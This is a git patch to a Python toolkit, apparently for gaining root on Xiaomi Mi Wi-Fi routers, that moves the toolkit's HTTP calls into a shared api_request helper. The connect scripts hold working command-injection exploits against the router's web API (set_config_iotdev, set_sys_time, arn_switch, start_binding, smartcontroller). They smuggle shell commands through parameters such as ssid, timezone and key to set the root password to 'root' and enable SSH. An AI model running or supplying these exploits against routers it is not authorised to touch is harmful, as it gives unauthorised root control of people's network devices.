From e34a3439c755a67a3885d6a6c93ab8f32e681edb Mon Sep 17 00:00:00 2001 From: remittor Date: Thu, 30 Jan 2025 09:11:58 +0300 Subject: [PATCH] gateway: Add common function api_request --- connect2.py | 23 +++++---- connect4.py | 22 ++++----- connect5.py | 8 +-- connect6.py | 26 +++++----- gateway.py | 137 ++++++++++++++++++++++++++++++--------------------- read_info.py | 6 +-- 6 files changed, 119 insertions(+), 103 deletions(-) diff --git a/connect2.py b/connect2.py index f9b66c2..0a82d0d 100644 --- a/connect2.py +++ b/connect2.py @@ -25,7 +25,7 @@ from gateway import * gw = Gateway(timeout = 4, detect_ssh = False) if gw.status < 1: - die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr)) + die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr)) print("device_name =", gw.device_name) print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel)) @@ -35,20 +35,19 @@ dn = gw.device_name gw.ssh_port = 22 ret = gw.detect_ssh(verbose = 1, interactive = True) if ret > 0: - die(0, "SSH server already installed and running") + die(0, "SSH server already installed and running") stok = gw.web_login() -ext_name = 'misystem/set_config_iotdev' -user_id = '_username_' -def exec_cmd(cmd): - params = { 'bssid': 'Xiaomi', 'user_id': user_id, 'ssid': ('-h' + '\n' + cmd + '\n') } - res = requests.get(gw.apiurl + ext_name, params = params) - return res.text + +def exec_cmd(cmd, api = 'API/misystem/set_config_iotdev'): + params = { 'bssid': 'Xiaomi', 'user_id': '_username_', 'ssid': ('-h' + '\n' + cmd + '\n') } + resp = gw.api_request(api, params) + return resp res = exec_cmd('nvram set bootdelay=3; set boot_wait=on; nvram set ssh_en=1; nvram commit;') -if res != '{"code":0}': - die('Extension "/api/{}" not working!'.format(ext_name)) +if not res or int(res['code']) != 0: + die('Exploit "set_config_iotdev" not working!') cmd = '' cmd += 'echo -e "root\\nroot" | passwd root' + '\n' @@ -58,8 +57,8 @@ cmd += "/etc/init.d/dropbear enable" + '\n' cmd += "/etc/init.d/dropbear restart" + '\n' cmd += 'logger -p err -t XMiR "completed!"' + '\n' res = exec_cmd(cmd) -#if res != '{"code":0}': -# die('Extension "/api/misystem/set_config_iotdev" not working!!!') +#if not res or int(res['code']) != 0: +# die('Exploit "set_config_iotdev" not working!!!') time.sleep(0.5) gw.passw = 'root' diff --git a/connect4.py b/connect4.py index 6625cba..e96d98f 100644 --- a/connect4.py +++ b/connect4.py @@ -40,23 +40,19 @@ if not info or info["code"] != 0: die('Cannot get init_info') ccode = info["countrycode"] -if ccode == "CN": - print('Current CountryCode = CN') +print(f'Current CountryCode = {ccode}') stok = gw.web_login() -def exec_cmd(cmd = {}, api = 'misystem/set_sys_time'): - params = cmd - if isinstance(cmd, str): - params = { 'timezone': " ' ; " + cmd + " ; " } - res = requests.get(gw.apiurl + api, params = params) - return res.text + +def exec_cmd(cmd, api = 'API/misystem/set_sys_time'): + resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " }) + return resp def get_netmode(): - res = exec_cmd(api = 'xqnetwork/get_netmode') - if '"code":0' in res: - dp = json.loads(res) - return int(dp["netmode"]) + res = gw.api_request('API/xqnetwork/get_netmode') + if res and res['code'] == 0: + return int(res["netmode"]) return -1 netmode = get_netmode() @@ -109,7 +105,7 @@ if netmode != 4: #res = exec_cmd('logger hello_world_3335556_') res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear") -if '"code":0' not in res: +if not res or res['code'] != 0: die('Exploit not working!!!') #res = exec_cmd("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear") diff --git a/connect5.py b/connect5.py index d7bcc61..0239951 100644 --- a/connect5.py +++ b/connect5.py @@ -69,16 +69,16 @@ vuln_cmd = "/usr/sbin/sysapi macfilter set mac=;; wan=no;/usr/sbin/sysapi macfil max_cmd_len = 100 - 1 - len(vuln_cmd) hackCheck = False -def exec_smart_cmd(cmd, timeout = 7): - api = 'xqsmarthome/request_smartcontroller' +def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'): sc_command = cmd['command'] payload = json.dumps(cmd, separators = (',', ':')) try: - res = requests.post(gw.apiurl + api, data = { "payload": payload }, timeout = timeout) + data = { "payload": payload } + res = gw.api_request(api, data, resp = 'text', post = 'x-www-form', timeout = timeout) except Exception as e: msg = getattr(e, 'message', str(e)) raise ExploitError(f'Cannot send POST-request "{sc_command}" to SmartController service. {msg}') - return res.text + return res def exec_smart_command(cmd, timeout = 7, ignore_err_code = 0): res = exec_smart_cmd( { "command": cmd } , timeout = timeout) diff --git a/connect6.py b/connect6.py index df07291..41dd275 100644 --- a/connect6.py +++ b/connect6.py @@ -39,23 +39,19 @@ print(f'Current CountryCode = {ccode}') stok = gw.web_login() -def exploit_1(cmd = { }, api = 'misystem/arn_switch'): +def exploit_1(cmd, api = 'API/misystem/arn_switch'): # vuln/exploit author: ????????? - params = cmd - if isinstance(cmd, str): - cmd = cmd.replace(';', '\n') - params = { 'open': 1, 'mode': 1, 'level': "\n" + cmd + "\n" } - res = requests.get(gw.apiurl + api, params = params) - return res.text - -def exploit_2(cmd = { }, api = 'xqsystem/start_binding'): + cmd = cmd.replace(';', '\n') + params = { 'open': 1, 'mode': 1, 'level': "\n" + cmd + "\n" } + res = gw.api_request(api, params, resp = 'text') + return res + +def exploit_2(cmd, api = 'API/xqsystem/start_binding'): # vuln/exploit author: ????????? - params = cmd - if isinstance(cmd, str): - cmd = cmd.replace(';', '\n') - params = { 'uid': 1234, 'key': "1234'\n" + cmd + "\n'" } - res = requests.get(gw.apiurl + api, params = params) - return res.text + cmd = cmd.replace(';', '\n') + params = { 'uid': 1234, 'key': "1234'\n" + cmd + "\n'" } + res = gw.api_request(api, params, resp = 'text') + return res # get device orig system time diff --git a/gateway.py b/gateway.py index 4b9a094..b381cde 100644 --- a/gateway.py +++ b/gateway.py @@ -49,18 +49,13 @@ def die(*args): print(" ") sys.exit(err) -def get_http_headers(): - headers = {} - headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" - headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" - return headers - class Gateway(): def __init_fields(self): self.use_ssh = True self.use_ftp = False self.verbose = 2 + self.con_timeout = 2 self.timeout = 4 self.memcfg = None # shared memory "XMiR_12345" self.model_id = -2 @@ -77,6 +72,8 @@ class Gateway(): self.socket = None # TCP socket for SSH self.ssh = None # SSH session self.login = 'root' # default username + self.user_agent = "curl/8.4.0" + self.last_resp_text = None def __init__(self, timeout = 4, verbose = 2, detect_device = True, detect_ssh = True, load_cfg = True): random.seed() @@ -103,6 +100,50 @@ class Gateway(): if port <= 0: die("Can't found valid SSH server on IP {}".format(self.ip_addr)) + def api_request(self, path, params = None, resp = 'json', post = '', timeout = 4, stream = False): + self.last_resp_code = 0 + self.last_resp_text = None + headers = { } + if post == 'raw' or post == 'bin': + headers["Content-Type"] = "application/octet-stream" + elif post == 'json': + headers["Content-Type"] = "application/json" + elif post: + headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" + headers["User-Agent"] = self.user_agent + url = f"http://{self.ip_addr}/cgi-bin/luci/" + if path.startswith('API/'): + url += f';stok={self.stok}/api' + path[3:] + else: + url += path + t_timeout = (self.con_timeout, timeout) + if post: + response = requests.post(url, data = params, stream = stream, headers = headers, timeout = t_timeout) + else: + response = requests.get(url, params = params, stream = stream, headers = headers, timeout = t_timeout) + self.last_resp_code = response.status_code + if resp and not stream: + try: + self.last_resp_text = response.text + except Exception: + pass + if resp == 'text': + return response.text + if resp == 'TEXT': + response.raise_for_status() + return response.text + if resp.lower() == 'json': + if response.status_code == 500: # Internal Server Error + return None + response.raise_for_status() + try: + dres = json.loads(response.text) + except Exception: + raise RuntimeError(f'Received inccorrect JSON from "{path}" => {response.text}') + return dres + return response + #return response.status_code, response.content + def detect_device(self): self.model_id = -2 self.device_name = None @@ -114,25 +155,24 @@ class Gateway(): self.nonce_key = None self.status = -2 try: - r0 = requests.get("http://{ip_addr}/cgi-bin/luci/web".format(ip_addr = self.ip_addr), timeout = self.timeout) - r0.raise_for_status() + page = self.api_request('web', resp = 'TEXT', timeout = self.timeout) #with open("r0.txt", "wb") as file: - # file.write(r0.text.encode("utf-8")) - hardware = re.findall(r'hardware = \'(.*?)\'', r0.text) + # file.write(page.encode("utf-8")) + hardware = re.findall(r'hardware = \'(.*?)\'', page) if hardware and len(hardware) > 0: self.device_name = hardware[0] else: - hardware = re.findall(r'hardwareVersion: \'(.*?)\'', r0.text) + hardware = re.findall(r'hardwareVersion: \'(.*?)\'', page) if hardware and len(hardware) > 0: self.device_name = hardware[0] self.device_name = self.device_name.upper() - romver = re.search(r'romVersion: \'(.*?)\'', r0.text) + romver = re.search(r'romVersion: \'(.*?)\'', page) self.rom_version = romver.group(1).strip() if romver else None - romchan = re.search(r'romChannel: \'(.*?)\'', r0.text) + romchan = re.search(r'romChannel: \'(.*?)\'', page) self.rom_channel = romchan.group(1).strip().lower() if romchan else None - mac_address = re.search(r'var deviceId = \'(.*?)\'', r0.text) + mac_address = re.search(r'var deviceId = \'(.*?)\'', page) self.mac_address = mac_address.group(1) if mac_address else None - nonce_key = re.search(r'key: \'(.*)\',', r0.text) + nonce_key = re.search(r'key: \'(.*)\',', page) self.nonce_key = nonce_key.group(1) if nonce_key else None except requests.exceptions.HTTPError as e: print("Http Error:", e) @@ -151,7 +191,7 @@ class Gateway(): die("You need to make the initial configuration in the WEB of the device!") self.model_id = self.get_modelid_by_name(self.device_name) self.status = -1 - x = r0.text.find('a href="/cgi-bin/luci/web/init/hello') + x = page.find('a href="/cgi-bin/luci/web/init/hello') if (x > 10): die("You need to make the initial configuration in the WEB of the device!") self.status = 1 @@ -173,15 +213,14 @@ class Gateway(): self.xqpassword = self.get_xqpassword() return self.status - def web_ping(self, timeout, wait_timeout = 0): + def web_ping(self, con_timeout, wait_timeout = 0): ret = True start_time = datetime.datetime.now() try: - res = requests.get("http://{ip_addr}/cgi-bin/luci/web".format(ip_addr = self.ip_addr), timeout = timeout) - res.raise_for_status() - mac_address = re.search(r'var deviceId = \'(.*?)\'', res.text) + page = self.api_request('web', resp = 'TEXT', timeout = (con_timeout, 4)) + mac_address = re.search(r'var deviceId = \'(.*?)\'', page) self.mac_address = mac_address.group(1) if mac_address else None - nonce_key = re.search(r'key: \'(.*)\',', res.text) + nonce_key = re.search(r'key: \'(.*)\',', page) self.nonce_key = nonce_key.group(1) if nonce_key else None except Exception: ret = False @@ -210,7 +249,7 @@ class Gateway(): else: return hashlib.sha256(string).hexdigest() - def web_login(self): + def web_login(self, timeout = 4): self.stok = None if not self.nonce_key or not self.mac_address: die("Xiaomi Mi Wi-Fi device is wrong model or not the stock firmware in it.") @@ -225,11 +264,10 @@ class Gateway(): password = (nonce + account_str).encode('utf-8') password = self.xqhash(password) username = 'admin' - data = "username={username}&password={password}&logtype=2&nonce={nonce}".format(username = username, password = password, nonce = nonce) - requrl = "http://{ip_addr}/cgi-bin/luci/api/xqsystem/login".format(ip_addr = self.ip_addr) - res = requests.post(requrl, data = data, headers = get_http_headers()) + data = f"username={username}&password={password}&logtype=2&nonce={nonce}" + text = self.api_request('api/xqsystem/login', data, post = 'x-www-form', resp = 'text', timeout = timeout) try: - stok = re.findall(r'"token":"(.*?)"', res.text)[0] + stok = re.findall(r'"token":"(.*?)"', text)[0] except Exception: self.webpassword = "" die("WEB password is not correct! (encryptmode = {})".format(self.encryptmode)) @@ -242,16 +280,13 @@ class Gateway(): return "http://{ip_addr}/cgi-bin/luci/;stok={stok}/api/".format(ip_addr = self.ip_addr, stok = self.stok) def get_pub_info(self, api_name, timeout = 5): - subsys = 'xqsystem' - if api_name == 'router_info' or api_name == 'topo_graph': - subsys = 'misystem' - try: - url = "http://{ip_addr}/cgi-bin/luci/api/{subsys}/{api_name}".format(ip_addr = self.ip_addr, subsys = subsys, api_name = api_name) - res = requests.get(url, timeout = timeout) - res.raise_for_status() - except Exception: - return {} - return json.loads(res.text) + if '/' in api_name: + path = api_name + elif api_name in [ 'router_info', 'topo_graph' ]: + path = f'api/misystem/{api_name}' + else: + path = f'api/xqsystem/{api_name}' + return self.api_request(path, timeout = timeout) def get_init_info(self, timeout = 5): return self.get_pub_info('init_info', timeout = timeout) @@ -278,14 +313,9 @@ class Gateway(): def get_device_systime(self, fix_tz = True): # http://192.168.31.1/cgi-bin/luci/;stok=14b996378966455753104d187c1150b4/api/misystem/sys_time # response: {"time":{"min":32,"day":4,"index":0,"month":10,"year":2023,"sec":7,"hour":6,"timezone":"XXX"},"code":0} - res = requests.get(self.apiurl + 'misystem/sys_time') - try: - dres = json.loads(res.text) - code = dres['code'] - except Exception: - raise RuntimeError(f'Error on parse response for command "sys_time" => {res.text}') - if code != 0: - raise RuntimeError(f'Error on get sys_time => {res.text}') + dres = self.api_request('API/misystem/sys_time') + if not dres or dres['code'] != 0: + raise RuntimeError(f'Error on get sys_time => {dres}') dst = dres['time'] if fix_tz and 'timezone' in dst: if "'" in dst['timezone'] or ";" in dst['timezone']: @@ -302,15 +332,10 @@ class Gateway(): sec = dst['sec'] timezone = dst['timezone'] params = { 'time': f"{year}-{month}-{day} {hour}:{min}:{sec}", 'timezone': timezone } - res = requests.get(self.apiurl + 'misystem/set_sys_time', params = params) - try: - dres = json.loads(res.text) - code = dres['code'] - except Exception: - raise RuntimeError(f'Error on parse response for command "set_sys_time" => {res.text}') - if code != 0: - raise RuntimeError(f'Error on exec command "set_sys_time" => {res.text}') - return res.text + dres = self.api_request('API/misystem/set_sys_time', params) + if not dres or dres['code'] != 0: + raise RuntimeError(f'Error on exec command "set_sys_time" => {dres}') + return True def wait_shutdown(self, timeout, verbose = 1): if verbose: @@ -353,10 +378,10 @@ class Gateway(): return False def reboot_device(self, wait_timeout = None): + api = 'API/xqsystem/reboot' try: - params = { 'client': 'web' } - res = requests.post(self.apiurl + "xqsystem/reboot", params = params, timeout=self.timeout) - if res.text.find('"code":0') < 0: + text = self.api_request(api, { 'client': 'web' }, post = 'json', resp = 'text') + if '"code":0' not in text: return False if wait_timeout: if not self.wait_shutdown(wait_timeout): diff --git a/read_info.py b/read_info.py index ae32248..f251ccd 100644 --- a/read_info.py +++ b/read_info.py @@ -963,11 +963,11 @@ class SysLog(): die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr)) if self.verbose > 0: print("Start generating syslog...") - r2 = requests.get(gw.apiurl + "misystem/sys_log", timeout = timeout) - if r2.text.find('"code":0') < 0: + r2 = gw.api_request("API/misystem/sys_log", resp = 'text', timeout = timeout) + if '"code":0' not in r2: die("SysLog not generated!") try: - path = re.search(r'"path":"(.*?)"', r2.text) + path = re.search(r'"path":"(.*?)"', r2) path = path.group(1).strip() except Exception: die("SysLog not generated! (2)")